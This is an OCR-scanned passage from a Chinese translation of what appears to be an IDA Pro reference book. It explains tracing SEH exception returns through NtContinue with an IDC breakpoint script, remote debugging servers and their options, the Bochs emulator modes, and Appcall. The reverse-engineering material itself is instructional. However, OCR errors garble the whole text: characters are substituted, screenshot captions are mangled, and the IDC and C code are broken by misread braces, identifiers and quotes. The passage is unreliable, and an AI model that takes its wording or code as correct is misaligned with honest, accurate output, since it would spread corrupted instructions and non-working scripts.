View-ESP ) 将 跳 转 到 该 SEH 异常 处 理 函 数 的 地 址 。 这 个 插件 的 唯一 目的 在 于 简化 定位 异常 处 理 
程序 的 过 程 。 读 者 可 以 在 本 书 的 网 站 上 找到 SEH 链 插 件 的 源 代 码 。 

有 关 异 常 处 理 过 程 的 男 一 个 问题 在 于 异常 处 理 程序 如 何 将 控制 权 转 交 ( 如 果 它 选择 这 样 做 ) 
给 其 中 发 生 异 党 的 应 用 程序 。 如 果 操 作 系 统 调 用 一 个 异常 处 理 水 数 , 它 将 允许 该 图 数 访问 CPU dr 
存 器 在 发 和 后 异常 时 设置 的 所 有 内 容 。 在 处 理 异 常 的 过 程 中 , 该 函数 可 能 会 修改 一 个 或 儿 个 CPU 寄 
存 需 全， 然后 将 控制 权 转 交 给 应 用 程序 。 这 样 做 是 为 了 证 异 凋 处理 程 序 有 机 会 修复 进程 的 状态 ， 
从 而 使 进程 继续 正常 执行 。 如 果 异 常 处 理 程序 决定 让 该 进程 继续 执行 ， 它 将 使 用 异常 处 理 程序 所 
做 的 修改 向 操作 系统 发 出 通知 ， 并 还 原 该 进程 的 寄存 顺 值 。 如 第 21 章 所 述 ， 一 些 反 逆 回 工程 实用 
工具 通过 在 异常 处 理 阶 段 修 改 指令 指针 的 保存 值 ， 利 用 异常 处 理 程序 更 改进 程 的 执行 流 。 这 时 如 
果 操 作 系 统 将 控制 权 转 交 给 该 进程 ， 这 个 进程 将 在 修改 后 的 指令 指针 指定 的 地 址 处 恢复 执行 。 

在 有 关 跟 踪 异 常 的 博客 文章 中 ，Ilfak 讨论 了 一 个 事实 ， 即 Windows SEH 异常 处 理 程序 通过 
ntdll.dll ët NtContinue (也 叫做 ZwContinue ) 将 控制 权 转 交 给 受 影响 的 进程 。 由 于 NtContinue 
已 经 访问 了 该 进程 保存 的 所 有 寄存 需 值 (通过 它 的 一 个 参数 )， 因 此 通过 分 析 NtContinue 中 保存 
的 指令 指针 所 包含 的 值 , 我 们 可 以 确定 该 进程 到 底 在 什么 地 方 恢复 执行 。 只 要 知道 该 进程 将 在 什 
么 地 方 恢复 执行 ,我 们 就 可 以 设置 一 个 断 点 ， 以 避免 步 入 操作 系统 代码 ， 并 在 进程 恢复 执行 前 尽 
早 令 进程 中 止 。 上 述 过 程 可 以 按 以 下 步骤 执行 。 

(1) 定位 NtContinue 并 在 它 的 第 一 条 指令 上 设置 一 个 非 中 止 断 点 。 

(2) 给 这 个 断 点 添加 一 个 断 点 条 件 。 

(3) 到 达 该 断 点 时 ， 通 过 读 取 栈 中 CONTEXT 指针 的 内 容 获 得 所 保存 的 寄存 器 的 地 址 。 

(4) 从 CONTEXT 记录 中 获取 该 进程 保存 的 指令 指针 的 值 。 

(5) 在 得 到 的 地 址 上 设置 一 个 断 点 ， 并 让 程序 继续 执行 。 

使 用 一 个 与 隐藏 调试 希 脚 本 类 似 的 进程 , 我 们 可 以 自动 完成 所 有 这 些 任务 , 并 将 它们 与 启动 
一 个 调试 会 话 关联 起 来 。 下 面 的 代码 说 明 如 何在 调试 器 中 启动 一 个 进程 ， 并 在 NtContinue Li 
置 一 个 断 点 : 
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static main() { 
auto func; 
RunTo(BeginEA()); 
GetDebuggerEvent(WFNE SUSP, -1); 
func = LocByName("ntdll NtContinue"); 
AddBpt ( func) ; 
SetBptCnd(func, "bpt NtContinue()"); 


j 


这 段 代 码 的 目的 很 简单 ， 即 在 NtContinue 的 入 口 处 设置 一 个 条 件 断 点 。 该 断 点 的 行为 通过 
下 面 的 IDC 函数 bpt NtContinue 执行 : 





static bpt NtContinue() { 
auto p ctx = Dword(ESP + 4); //get CONTEXT pointer argument 
auto next eip = Dword(p ctx + OxB8); //retrieve eip from CONTEXT 
AddBpt(next eip); //set a breakpoint at the new eip 
SetBptCnd(next eip, "Warning(V'Exception return hitV") || 1"); 
return 0; //don?t stop 


j 


jT PRICE PEE Dre n] TEEN de HI AER E ECG TREE C9), H CONTEXT 结构 体 
中 偏 移 量 为 0xB8 处 获取 所 保存 的 指令 指针 值 (@ )， 然 后 在 该 地 址 上 设置 一 个 断 点 (ei 为 了 
使 用 户 清 楚 知 道 执行 为 什么 会 中 止 ， 这 个 男 数 增加 了 一 个 断 点 条 件 〈 始终 为 真 )， 以 回 用 户 显示 
一 条 消息 ( @ )。 我 们 之 所 以 这 样 做 ， 是 因为 该 断 点 并 不 是 由 用 户 显 式 设 置 ， 而 且 用 户 可 能 没有 
将 这 一 事件 与 异常 处 理 程序 的 返回 关联 起 来 。 

这 个 例子 提供 了 一 个 简单 的 方法 ， 说明 如 何 处 理 异常 返回 。 我 们 可 以 在 断 点 函数 bpt Nt- 
Continue 中 添加 更 加 复杂 的 逻辑 。 例 如， 如果 你 怀疑 一 个 异常 处 理 程序 正 操 纵 调试 寄存 带 的 内 容 
来 阻止 你 设置 硬件 断 点 , 那么 在 将 控制 权 返 还 给 被 调试 的 进程 之 前 , 你 可 以 将 调试 寄存 需 的 值 恢 
复 到 一 个 已 知 正确 的 值 。 


GK 























25.6 hz 


除 查 明 软 件 bug 这 个 明显 的 用 途 外 , 调试 带 还 是 一 个 高 效 的 逆 问 工程 工具 。 在 恶意 软件 和 模 
糊 代码 分 析 过 程 中 ， 如果 一 个 应 用 程序 既 可 用 于 议 态 分 析 ， 又 可 用 于 动态 分 析 ， 这 可 以 为 我 们 市 
省 宝贵 的 时 间 , 而 且 我 们 也 不 需要 付出 太 大 和 努力, 就 可 以 使 用 一 球 工 具 生 成 可 由 为 一 球 工 具 分 析 
的 数据 。 当 前 有 大 量 不 同形 式 的 调试 器 , IDA 的 调试 器 可 能 不 是 你 跟踪 应 用 程序 中 的 运行 时 间 题 
的 最 佳 选择 。 但 是 ， 如 末 你 需要 对 应 用 程序 进行 逆向 工程 分 析 , 或 者 只 是 希望 在 调试 过 程 中 获得 
一 个 局 质量 的 反 汇 编 代 码 清单 ，IDA 的 调试 带 完 全 能 够 满足 你 的 需要 。 在 第 26 章 中 ， 我 们 将 讨 
论 IDA 调试 希 的 高 级 功能 ， 包 括 远 程 调 试 以 及 它 在 Linux 和 OS X 平 台 上 的 调试 功能 。 






































其 他 调试 功能 


第 24 EMP 25 章 中 ， 我 们 全 面 介 绍 了 调试 锅 的 基本 功能 ， 包 括 用 脚本 实现 调试 硕 操 

T. 以 及 如 何 使 用 它 对 代码 进行 去 模糊 处 理 。 在 这 一 章 中 ， 我 们 将 了 解 如 何 通过 IDA 

进行 远程 调试 ， 将 Bochs x86 模拟 器 "作为 调试 平台 ， 以 及 Appeal 功能 ( 它 可 以 有 效 扩展 IDA 
的 脚本 功能 ， 以 包含 由 某 进 程 及 其 相关 库 定义 的 任何 函数 )， 从 而 完成 对 调试 硕 的 讨论 。 








26.1 使 用 IDA 进行 远程 调试 


所 有 版 本 的 IDA 均 附 带 有 用 于 实现 远程 调试 会 话 的 服务 需 组 件 。 此 外 ，IDA 还 可 以 连接 到 
使 用 gdb server 或 内 置 gdb 存根 的 远程 gdb 会 话 。 远程 调试 的 主要 优点 之 一 在 于 , 它 能 够 将 GUI 
调试 磊 界 面 作为 任何 调试 会 话 的 前 端 。 多数 情况 下 ， 除 设置 并 建立 远程 调试 服务 硕 连 接 外 ， 远 程 
调试 会 话 与 本 地 调试 会 话 并 不 存在 太 大 区 别 。 





26.1.1 使 用 Hex-Rays 调 试 服务 器 


要 开始 远程 调试 , 首先 需要 在 进行 进程 调试 的 计算 机 上 局 动 相应 的 调试 服务 硕 组 件 。IDA D 
市 有 以 下 服务 硕 组 件 。 

D win32_remote.exe。 在 Windows 计算 机 上 执行 的 、 用 于 调试 32 位 Windows 应 用 程序 的 
服务 器 组 件 。 

口 win64_remotex64.exe。 在 64 位 Windows 计算 机 上 执行 的 、 用 于 调试 64 位 Windows 应 
用 程序 的 服务 大 组 件 〈 仅 用 于 IDA 高 级 版 )。 

Q wince_remote arm.dll。 上 传 到 Windows CE 设备 (通过 ActiveSync ) 的 服务 器 组 件 。 

口 mac_server。 在 OSX 计算 机 上 执行 的 、 用 于 调试 32 位 OS XX 应 用 程序 的 服务 右 组 件 。 

Q mac serverx64. 1E 64 OS X 计 算 机 上 执行 的 、 用 于 调试 64 位 OS X 应 用 程序 的 服务 

器 组 件 〈 仅 用 于 IDA 高 级 版 )。 
O linux_server。 在 Linux 计算 机 上 执行 的 、 用 于 调试 32 位 Linux 应 用 程序 的 服务 右 组 件 。 





(D 参见 http://bochs.sourceforge.net/。 
D 参见 http:/www.hexblog.com/?p=112 。 
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O linux_serverx64。 1E 64 f; Linux 计算 机 上 执行 的 、 用 于 调试 64 位 Linux 应 用 程序 的 服务 
器 组 件 〈 仅 用 于 IDA 高 级 版 )。 

口 armlinux_server, 在 基于 ARM 的 计算 机 上 执行 的 .用 于 调试 ARM 应 用 程序 的 服务 磊 组 件 。 

口 android server。 在 Android 设 备 上 执行 的 、 用 于 调试 Android 应 用 程序 的 服务 需 组 件 。 

要 在 任何 平台 上 执行 远程 调试 , 你 只 需要 在 该 平台 上 执行 相应 的 服务 硕 组 件 。 你 不 需要 在 远 
EFR ER IDA 的 完整 版 本 。 换 名 话说， 如 果 你 要 将 Windows 版 本 的 IDA 作为 调试 客户 端 ， 
并 且 和 希望 远程 调试 Linux 应 用 程序 ， 则 除了 要 调试 的 二 进 制 文件 外 ， 你 只 需 复 制 linux server X 
件 " 并 在 Linux 系统 上 执行 该 文件 。 

不 论 你 在 服务 硕 上 运行 什么 平台 ， 服 务 需 组 件 均 接 受 以 下 3 个 命令 行 选项 。 

O -p<port number» 用 于 指定 备用 TCP 端口 ， 以 便服 务 需 监听 。 默 认 端 口 为 23946。 请 注意 ，-p 

与 端口 号 之 间 没 有 空格 。 
O -P<password> 用 于 指定 客户 端 连接 调试 服务 器 所 必需 的 密码 。 请 注意 ，-P 与 提供 的 密码 
之 间 没 有 空格 。 

O -v 将 服务 需 置 于 详细 模式 。 

并 没有 选项 用 于 限制 服务 器 所 监听 的 IP 地 址 。 如 果 你 希望 限制 进入 的 连接 ， 可 以 将 基于 主 
机 的 防火 墙 规 则 应 用 于 调试 平台 。 局 动 服 务 硕 后 ， 你 可 以 在 任何 受 文 持 的 操作 系统 上 运行 IDA， 
并 将 它 作为 连接 调试 服务 需 的 客户 端 界面 ， 但 任何 时 候 ， 服 务 需 都 只 能 处 理 一 个 活动 调试 会 话 。 
如 果 你 希望 保持 儿 个 同步 调试 会 话 ， 你 必须 在 几 个 不 同 的 TCP 端口 上 启动 多 个 调试 服务 器 实例 。 

从 客户 端的 角度 看 ,远程 调试 通过 Debugger » Process Options 命令 指定 服务 需 主 机 名 称 与 端 
口 来 启动 ， 如 图 26-1 所 示 。 你 必须 首先 执行 此 操作 ， 然 后 再 局 动 或 连接 要 调试 的 进程 。 


入 Debug application setup: linux | x| 


Application | [tmp/debug test | 
Input file [tmp/debug test 


Directory [tmp € 





























Parameters | -] 
Hostname [ 192. 168. 1. 100 D Port [23946 E 

Password | "| 

[ Save network settings as default 


ECHTE 





图 26-1 调试 絮 进 程 选项 对 话 框 
此 对 话 框 中 的 前 4 个 字段 可 用 于 本 地 和 远程 调试 会 话 ， 而 Hostname, Port 和 Password 字段 
仅 用 于 远程 调试 会 话 。 下 面 简 要 介绍 这 个 对 话 杠 中 的 字段 。 
口 Application。 你 要 调试 的 应 用 程序 二 进 制 文件 的 完整 路 径 。 对 于 本 地 调试 会 话 ,， 该 路 径 为 
本 地 文件 系统 中 的 路 径 。 对 于 远程 调试 会 话 ， 该 路 径 为 调试 服务 大 上 的 路 径 。 如 果 你 选 











ORMES, IDA 附带 的 ”server 二 进 制 文件 依赖 大 量 共 享 库 。 你 可 以 使 用 1dd〈 在 OS X EX otool -L) 命令 列 出 
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择 不 使 用 完整 路 径 ， 远 程 服 务 器 将 搜索 它 当 前 的 工作 目录 。 

O Input file。 用 于 创建 IDA 数据 库 的 文件 的 完整 路 径 。 对 于 本 地 调试 会 话 ， 该 路 径 为 本 地 
文件 系统 中 的 路 径 。 对 于 远程 调试 会 话 ， 该 路 径 为 调试 服务 锅 上 的 路 径 。 如 采 你 选择 不 
使 用 完整 路 径 ， 远 程 服务 硕 将 搜索 它 当 前 的 工作 目录 。 

O Directory。 应 在 其 中 局 动 进程 的 工作 目录 。 对 于 本 地 调试 ， 该 目录 必须 为 本 地 文件 系统 
中 的 目录 。 对 于 远程 调试 ， 该 目录 为 调试 服务 硕 上 的 目录 。 

Q Parameters。 用 于 指定 在 进程 启动 时 传递 给 它 的 任何 命令 行 参数 。 请 注意 ， 其 中 不 得 包 
含 任何 shell 元 字符 ( 如 <、> 和 | )。 任何 此 类 字符 将 作为 命令 行 参数 传递 给 进程 。 因 此 ， 
你 将 无 法 在 调试 锅 中 局 动 一 个 进程 ， 并 让 该 进程 执行 任何 类 型 的 输入 或 输出 重 定 向 。 对 
于 远程 调试 会 话 ， 进 程 输出 将 在 用 于 局 动 调试 服务 需 的 控制 台中 显示 。 

O Hostname。 和 远程 调试 服务 器 主机 或 IP 地 址 。 对 于 本 地 调试 会 话 ， 请 将 此 字段 留 空 。 

口 Port。 远 程 调试 服务 融 监 听 的 TCP 端口 号 。 

口 Password。 远 程 调试 服务 融 所 需 的 密码 。 请 注意 , 在 此 字段 中 输入 的 数据 不 会 受到 屏蔽 ， 

因此 ， 任 何 能 够 看 到 你 的 显示 带 的 人 都 能 够 获得 该 密码 。 而 且 ， 此 密码 将 以 明文 形式 传 
送 给 远程 服务 古 ， 任 何 能 够 拦截 网 络 数 据 包 的 人 也 能 够 获得 此 密码 。 

初 看 起 来 , 图 26-1 中 Application FRS Input File 字段 的 值 似乎 完全 相同 。 如 采 你 在 IDA 数 
据 库 中 打开 的 文件 与 你 在 远程 计算 机 上 运行 的 可 执行 文件 为 同一 文件 , 则 这 两 个 字段 中 的 值 也 为 
同一 个 值 。 但 是 ， 有 些 时 候 ， 你 可 能 希望 调试 你 在 IDA 数据 库 中 分 析 的 库 文 件 ( 如 DLL 1. 你 无 
法 直接 调试 库 文 件 ， 因 为 它们 并 非 独 立 的 可 执行 文件 。 这 时 ， 你 需要 将 Input File 字段 设置 为 库 
文件 的 路 径 。 而 Application 字段 则 必须 设置 为 使 用 你 要 调试 的 库 文件 的 应 用 程序 的 名 称 。 

连接 远程 gdb 服务 器 的 过 程 与 连接 远程 IDA 调试 服务 器 的 过 程 基本 相同 ， 只 存在 两 个 细微 
的 差别 。 首 先 ， 连 接 到 gdb server 不 需要 密码 ; HR, IDA 人 允许 你 通过 调试 锅 设 置 对 话 框 中 的 
相关 选项 按钮 来 指定 特定 于 gdb 的 行为 。GDB 配置 对 话 框 如 图 26-2 所 示 。 





















































Max packet size [2 H 
Timeout | 1000 -] 


[ Runa program before starting debugging 
Memory mar 


x86 options 
[v Software breakpoints at EIP+1 
P 








Use CS:IP in real mode 

















K|26-2 GDB 配置 对 话 框 
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值得 注意 的 是 ，IDA 无 法 获知 运行 gdb server 的 计算 机 的 体系 结构 ， 因 此 ， 你 需要 为 其 指 
定 处 理 需 类 型 ( 默认 为 Intel x86 ), 并 可 能 还 需要 指定 该 处 理 需 的 字 节 次 序 。 当前, IDA 可 为 x86、 
ARM, PowerPC 和 MIPS 处 理 器 提供 调试 界面 。 








26.1.2 ”连接 到 远程 进程 


许多 时 候 ， 你 可 能 需要 连接 到 远程 调试 服务 右上 运行 的 某 个 进程 。 例 如 ， 如 果 你 在 IDA 中 
没有 打开 数据 库 ， 你 可 以 执行 Debugger » Attach MS, M IDA 的 可 用 调试 妖 列 表 中 进行 选择 。 
如 采 你 选择 一 个 IDA 远程 调试 硕 ， 你 将 看 到 如 图 26-3 所 示 的 配置 对 话 框 。 

x 
Debug options | 


Hostname [ 192.168. 1.101 | Port | 23946 | 
Password | "| 


[ Save network settings as default 














图 26-3 xvf IR BUE. 
提供 适当 的 连接 参数 并 单 击 OK (确定 ) TUS, (DATE Ir ion xf D CAS Zero ht 





程 列表 ， 以 便 你 选择 并 连接 到 特定 的 进程 。 

此 外 ， 你 可 能 已 在 IDA 中 打开 了 一 个 二 进 制 文件 ， 并 且 和 希望 连接 到 一 个 远程 进程 。 这 时 ， 
你 可 能 需要 选择 一 个 调试 需 ( 如 果 之 前 没有 为 打开 的 文件 类 型 指定 调试 融 ) 或 切换 调试 器 类 型 ( 如 
果 当 前 并 未 选择 远程 调试 器 )。 选 择 调试 器 后 ， 你 还 必须 提供 远程 调试 服务 器 的 主机 名 称 和 密码 
FUR, (WS 26-1 )， 然 后 你 就 可 以 使 用 Debugger » Attach to Process 命令 连接 到 远程 进程 。 


26.1.3 ”远程 调试 期 间 的 异常 处 理 


在 第 25 音 中 ， 我 们 讨论 了 IDA 调试 带 的 异常 处 理 及 如 何 修改 调试 带 的 异常 处 理 行为 。 在 远 
程 调试 会 话 过 程 中 ， 调 试 可 的 默认 异常 处 理 行为 由 exceptions.cfg 文件 规定 ， 该 文件 保存 在 客户 
计算 机 中 ( 即 你 实际 运行 IDA 的 计算 机 ), 因此 ,你 可 以 修改 exceptions.cfg 文件 , 并 通过 Debugger 
Setup 对 话 框 ( 见 图 25-4) 重新 加 载 修改 后 的 文件 ， 而 无 需 访 问 远 程 服务 硕 。 


26.1.4 在 远程 调试 过 程 中 使 用 脚本 和 插件 


在 远程 调试 会 话 中 , 你 仍然 可 以 利用 脚本 和 插件 日 动 完成 调试 任务 。 你 选择 执行 的 任何 脚本 
或 插件 将 在 客户 计算 机 上 的 IDA 中 运行 。IDA 将 依次 处 理 与 远程 进程 交互 所 需 的 任何 操作 ， 如 
设置 断 点 ,查询 状态 ,修改 内 存 或 恢复 执行 。 在 脚本 看 来 ,调试 会 话 就 像 在 本 地 发 生 一 梓 。 唯 一 
需要 注意 的 是 ， 你 必须 确保 你 执行 的 脚本 和 插件 适用 于 目标 进程 运行 的 体系 结构 ， 而 非 IDA 客 
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户 闪 运行 的 体系 结构 〈 除 非 它 们 碰巧 为 同一 体系 结构 ), 换言之， 如果 你 在 Linux 上 将 Windows 
版 本 的 IDA 作为 远程 调试 客户 中， 就 不 能 指望 Windows 调试 做 隐藏 脚 本 发 挥 任何 作用 。 


26.2 ”使 用 Bochs 进行 调试 


Bochs 是 一 种 开源 x86 模拟 环境 。 使 用 Bochs 可 以 模拟 整个 x86 计算 机 系统 ， 包 括 模拟 常用 
的 VO 设备 及 一 个 日 定义 BIOS, Bochs 为 虚拟 化 软件 ( 如 VMware Workstation ) 提供 了 一 个 基于 
模拟 的 替代 方案 。 Hex-Rays JT 发 团队 的 Elias Bachaalany 首先 将 Bochs 集成 到 IDA 中 ， 从 而 为 传 
统 的 调试 提供 了 一 种 基于 模拟 的 替代 方案 。 "Windows 版 本 的 IDA 附带 并 安装 有 兼容 版 本 的 
Bochs, JẸ Windows 用户 如 果 需 要 使 用 Bochs ,必须 在 他 们 的 系统 上 安装 2.4.2 或 更 高 版 本 的 Bochs。 

安装 Bochs 后 ， 任 何 时 候 你 在 IDA 中 打开 一 个 x86 二 进 制 文件 ，IDA 将 提供 Local Bochs 调 
试 需 选项 。Bochs 的 出 现 使 得 在 非 Windows 系统 上 调试 Windows 应 用 程序 成 为 可 能 ， 因 为 这 时 
你 可 以 使 用 Bochs 模拟 Windows 应 用 程序 , 而 不 必 将 其 作为 本 机 进程 来 运行 。 作 为 模拟 需 , Bochs 
的 配置 选项 与 更 加 传统 的 调试 本 提供 的 配置 选项 略 有 不 同 。 最 重要 的 区 别 在 于 ，Bochs 可 在 以 下 
3 种 模式 下 运行 : 磁盘 映像 模式 、IDB 模式 和 PE 模式 。 你 可 以 使 用 Bochs 调试 器 配置 对 话 框 来 
选择 运行 模式 ， 如 图 26-4 所 示 。 


x 
BOCHSRC | c: Program Files IdaWfg'hbochsrc. ctg -] m | 

















[^ Delete image files upon session end 





[Use virtual breakpoints when protected mode is enabled 
Startup stack size (in KB) | 64 "| 
Maximum memor (in KE) | 7168 e | 


[ e | cm | 





图 26-4 Bochs 调试 器 选项 对 话 框 


就 所 执行 枚 举 的 质量 和 类 型 而 言 ， 每 种 模式 的 精确 程度 截然 不 同 。 





26.2.1 Bochs IDB 模式 


IDB 是 最 基本 的 Bochs 模式 。 在 IDB F, Bochs 仅 识别 你 的 数据 库 中 的 代码 。 内 存 区 域 
TERRE] Bochs 中 ， 并 通过 从 数据 库 中 复制 学 市 进行 填充 。 可 配置 的 栈 空 间 的 数量 取决 于 Bochs 














(D 参见 Recon 2011 ( http://www.recon.cx/ ) 中 的 “Designing a minimal operating system to emulate 32/64bits x86 code 26 ` 
snippets, shellcode or malware in Bochs” o 
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选项 对 话 框 中 的 设置 , IDA 将 日 行 决定 栈 的 位 置 。 模拟 从 名 为 ENTRY 的 数据 库 符号 ( 如 朱 已 定义 ) 
处 开始 执行 ( 即 最 初 指定 指令 指针 的 位 置 )。 如 果 ENTRY 符号 不 存在 ，IDA 会 在 打开 的 数据 库 中 
进行 检查 , 看 当前 是 否 有 一 定 范 围 的 位 置 处 于 选中 状态 , 并 将 这 个 范围 的 起 始 位 置 作为 调试 带 的 
入 口 点 。 如 果 没 有 选择 范围 ， 则 将 指令 指针 的 初始 值 作 为 光标 的 当前 位 置 。 在 IDB 模式 下 运行 
时 ， 需 要 记 住 的 是 : Bochs 不 提供 任何 操作 系统 广 持 ， 如 共 至 库 或 典型 进程 地 址 空间 中 任何 众 所 
周知 的 结构 的 位 置 。 只 要 代码 没有 引用 数据 库 以 外 的 任何 内 容 ， 你 完全 可 以 衣 历 PE 文件 、ELF 
文件 、 Mach-O 文件 或 一 小 段 原始 机 带 码 ( 如 入 侵 程序 负载 )。 如 末 你 需要 执行 菏 个 函数 以 了 解 其 
行为 ， 这 时 就 可 以 使 用 IDB 模式 ， 而 不 必 构 造 整个 进程 或 磁盘 映射 。 




















26.2.2 Bochs PE 模式 


在 PE 模式 下 , 你 可 以 执行 在 一 定 程 度 上 接近 进程 级 别 的 调试 。 选 择 并 激活 PE 模式 后 , IDA 
的 Bochs 控制 模块 (一 个 IDA 插件 ) 将 接管 控制 权 ， 并 以 类 似 于 Windows 进程 加 载 硕 的 方式 运 
行 ( 如 采 你 确实 在 运行 本 机 Windows 进程 )。PE 模式 进程 将 接收 进程 环境 块 ( PEB ) 与 线程 环境 
块 (TEB )， 以 及 一 个 模仿 将 在 实际 进程 中 创建 的 环境 块 的 栈 。 

Bochs 插件 还 会 将 大 量 常 用 Windows 库 加 载 到 模拟 的 进程 地 址 空间 中 ( 无需 执行 任何 代码 ), 
以 便于 正确 处 理 进 程 作 出 的 任何 库 调 用 。 你 可 以 配置 Bochs 在 调试 锅 司 动 时 具体 加 载 哪些 库 ， 并 
TE«IDADIR-/plugins/bochs/startup.idc 文件 中 指定 这 些 库 。 任 何 库 都 可 以 “ 按 原 样 ” 加 载 ， 或 者 指 
定 为 "将 被 拨 除 ”。 如 采 肝 个 库 市 有 “将 被 拨 除 ”标记 ，Bochs 插件 将 自动 “ 钩 住 ”该 库 导 出 的 每 个 
PRA, 并 将 这 些 子 数 重 定 问 到 一 个 Bochs 解释 晒 数 ( 有关 详细 信息 , 请 参阅 startup.idc 文件 和 IDA 
帮助 系统 )。 这 种 “ 拨 除 ”技巧 为 用 户 定 义 任 何 库 函数 的 目 定 义 行为 提供 了 极 大 便利 。 对 于 任何 
由 IDA“ 拨 除 ” 的 库 ， 你 可 以 定义 一 个 对 应 的 脚本 文件 , 在 其 中 定义 你 定制 的 行为 。 对 于 其 他 库 
(如 foolib.dll )，Bochs 插件 将 扫描 <IDADIR>/plugins/bochs 目录 ， 在 其 中 搜索 名 为 api foolib.idc 
或 api foolib.py 的 相关 脚本 。IDA Mhi «IDADIR-/plugins/bochs/api kernel32.idc 文件 ， 你 可 以 
通过 该 文件 了 解 这 类 文件 的 结构 ， 以 及 如 何 实现 各 种 也 数 的 自 定 义 行为 。 

在 PE 模式 下 ,“ 钓 住 ” 库 子 数 并 定义 目 定 义 行为 非常 重要 ， 因 为 这 种 模式 不 提供 任何 操作 系 
统 层 来 执行 共享 库 所 需 的 所 有 重要 操作 。 例 如 ,通过 为 函数 (如 VirtualAlloc ) 提供 备用 的 、 基 于 
脚本 的 行为 ( 如果 该 也 数 无 法 与 操作 系统 通信 ， 此 操作 将 失败 )， 你 可 以 让 模拟 的 进程 〈 在 某 种 程 
HE E) 确信 , 它 正 作为 具体 的 进程 运行 。 创建 此 类 基于 脚本 的 行为 的 目的 是 , 为 模拟 的 进程 提供 它 
在 与 具体 库 函 数 通信 时 〈 这 些 函 数 反 过 来 又 会 与 具体 的 操作 系统 进行 通信 ) 期 待 看 到 的 响应 。 

如 采 你 在 非 Windows 平 台 上 使 用 IDA， 你 可 以 将 任何 所 需 的 库 〈 在 startup.idc 文件 中 指定 ) 
从 Windows 系统 复制 到 IDA 系统 中 ,并 编辑 startup.idc 文件 ,使 其 指向 包含 所 有 复制 的 库 的 目录 ， 
从 而 充分 利用 Bochs PE 模式 的 优势 。 下 面 的 代码 清单 为 你 所 需 作 出 的 更 改 提 供 了 一 个 示例 。 









































// Define additional DLL path 
// (add triple slashes to enable the following lines) 
/// path /home/idauser/xp dlls/-c:Ninnt'Nsystem32N 
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使 用 PE 模式 在 Bochs 下 局 动 一 个 进程 时 ， 你 会 注意 到 一 个 不 同 之 处 ， 即 这 时 IDA 不 会 显示 
警告 对 话 框 ， 提 醒 你 在 调试 需 控 制 下 启动 一 个 潜在 恶意 的 进程 的 风险 。 出 现 这 种 情况 ， 是 因为 这 
时 IDA 只 会 创建 Bochs 模拟 器 进程 , 且 你 调试 的 所 有 代码 均 被 Bochs 模拟 器 视 为 它 所 模拟 的 代码 。 
IDA 甚至 不 会 以 你 所 调试 的 二 进 制 文件 创建 任何 本 机 进程 。 








26.2.3 ”Bochs 磁 盘 映 像 模式 


Bochs 调试 套 的 第 三 种 运行 模式 称 为 磁盘 映像 模式 。 除 可 与 IDA 集成 外 ，Bochs 本 里 也 是 一 
^ XA x86 系统 模拟 器。 因此 ， 你 完全 可 以 使 用 Bochs 提供 的 bximage 工具 创建 磁盘 映像 ， 并 
使 用 Bochs 及 任何 所 需 的 相关 操作 系统 安装 媒介 在 磁盘 映像 上 安装 一 个 操作 系统 ， 并 最 终 使 用 
Bochs 在 模拟 环境 中 运行 你 的 客户 操作 系统 。 

如 果 你 使 用 IDA/Bochs 的 主要 目的 是 了 解 采 个 进程 的 行为 , 那么 磁盘 映像 模式 可 能 并 不 适合 
你 。 要 隅 离 在 完全 模拟 的 操作 系统 中 运行 的 进程 并 观察 该 进程 的 行为 ， 并 不 是 一 个 简单 的 任务 ， 
你 需要 深入 了 解 该 操作 系统 ， 以 及 它 如 何 管理 进程 和 内 存 。 分 析 系 统 BIOS 与 启动 代码 是 
IDA/Bochs 的 优势 所 在 ， 因 为 这 时 操作 系统 代码 还 未 接管 控制 权 ， 分 析 它 们 会 相对 容易 一 些 。 

在 傍 盘 映像 模式 下 ， 你 不 会 将 可 执行 文件 映像 加 载 到 IDA. 中 。 相 反 ，IDA 附 市 有 一 个 识别 
Bochs 配置 文件 ( bochsre ) “的 加 载 器 。 使 用 Bochs 模拟 整个 系统 时 ，bochsrc 文件 用 于 描述 硬件 
执行 环境 。IDA 的 默认 bochsrc 文件 为 <IDADIR>/cfg/bochsrc.cfg。bochsrc 文件 主要 用 于 指定 系统 
BIOS, 、 视 频 ROM 和 磁盘 映像 文件 的 位 置 。IDA 的 bochsrc 加 载 硕 提供 最 少 的 加 载 服务 ， 仅 该 取 
所 加 载 的 Bochs 配置 文件 指定 的 第 一 个 磁盘 映像 文件 的 第 一 部 分 , 然后 将 Bochs 调试 可 用 于 新 的 
数据 库 。Hex-Rays 博客 ”上 讨论 了 如 何在 开发 主 启动 记录 时 使 用 IDA/Bochs。 


26.3 Appcall 


调试 器 的 Appcall 特性 有 效 地 扩展 了 IDC 或 IDAPython 通过 脚本 调用 活动 进程 中 的 任何 函数 
的 功能 。 上 述 功能 的 用 途 非 常 广 泛 ， 包括 将 额外 的 内 存 上 映射 到 进程 地 址 空间 中 (通过 调用 
VirtualAlloc 或 类 似 函 数 )， 以 及 将 新 库 注 入 到 所 调试 的 进程 中 ( 通过 调用 LoadLibrary， 或 通过 
调用 进程 中 的 函数 来 执行 你 宁愿 手动 执行 的 任务 ， 如 解码 数据 块 或 计算 散 列 值 )。 

要 使 用 Appcall， 必 须 将 你 要 调用 的 函数 加 载 到 所 调试 进程 的 地 址 空间 中 ， 并 且 IDA 必须 了 
解 或 获知 该 函数 的 原型 ， 以 便 正确 编列 或 解 列 参数 。 保存 当 前 调试 带 线 程 的 状态 ( 与 该 线程 有 关 
的 所 有 注册 ) 后 ， 你 所 作 的 任何 Appeal 调用 将 置 于 该 线程 中 。Appcall 完成 后 ，IDA 将 恢复 线程 
状态 ， 调 试 器 也 将 恢复 执行 ， 好 像 Appeal 从 未 发 生 一 样 。 

下 面 我 们 来 看 一 个 示例 ， 该 示例 使 用 Appcall 将 一 个 4096 字 节 的 内 存 块 分 配 到 当前 
( Windows ) 进程 地 址 空间 中 。 在 本 例 中 ， 我 们 希望 调用 的 Windows API 因数 名 为 VirtualAlloc， 









































(D 参见 http://bochs.sourceforge.net/doc/docbook/user/bochsre.html, TAX bochsrc 文件 格式 的 信息 。 
(2) 参见 http:/www.hexblog.com/?p=103 。 
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LPVOID WINAPI VirtualAlloc(LPVOID lpAddress, SIZE T dwSize, 
DWORD flAllocationType, DWORD flProtect); 








如 果 以 C 语言 编 写 代 码 ， 使 用 Appcall 调用 VirtualAlloc 函数 的 代码 如 下 所 示 : 
VirtualAlloc(NULL, 4096, MEM COMMIT | MEM RESERVE, PAGE READWRITE); 

解析 所 有 常量 后 ， 此 函数 调用 最 终 变 为 : 

VirtualAlloc(0, 4096, 0x3000, 4); 


